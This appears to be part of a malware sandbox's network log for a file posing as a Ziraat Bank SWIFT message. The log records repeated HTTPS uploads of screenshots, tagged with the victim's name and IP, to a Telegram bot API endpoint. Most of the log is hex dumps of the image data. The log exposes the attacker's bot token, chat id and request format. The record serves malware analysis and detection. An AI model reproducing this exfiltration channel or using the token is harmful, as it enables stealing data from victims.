                                                                        2024-12-12 20:39:55 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:39:55 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:39:57 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:39:57 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1814
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.549902149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:40:00 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd23ea346a9abb
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675718
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:40:00 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 33 65 61 33 34 36 61 39 61 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd23ea346a9abbContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:40:00 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:40:00 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:40:00 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:40:00 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:40:00 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:40:00 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
                                                                        2024-12-12 20:40:00 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
                                                                        2024-12-12 20:40:00 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:40:00 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:40:02 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:40:02 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1814
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.549921149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:40:10 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd86d580dca017
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675720
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:40:10 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 38 36 64 35 38 30 64 63 61 30 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd86d580dca017Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:40:10 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:40:10 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:40:10 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:40:10 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
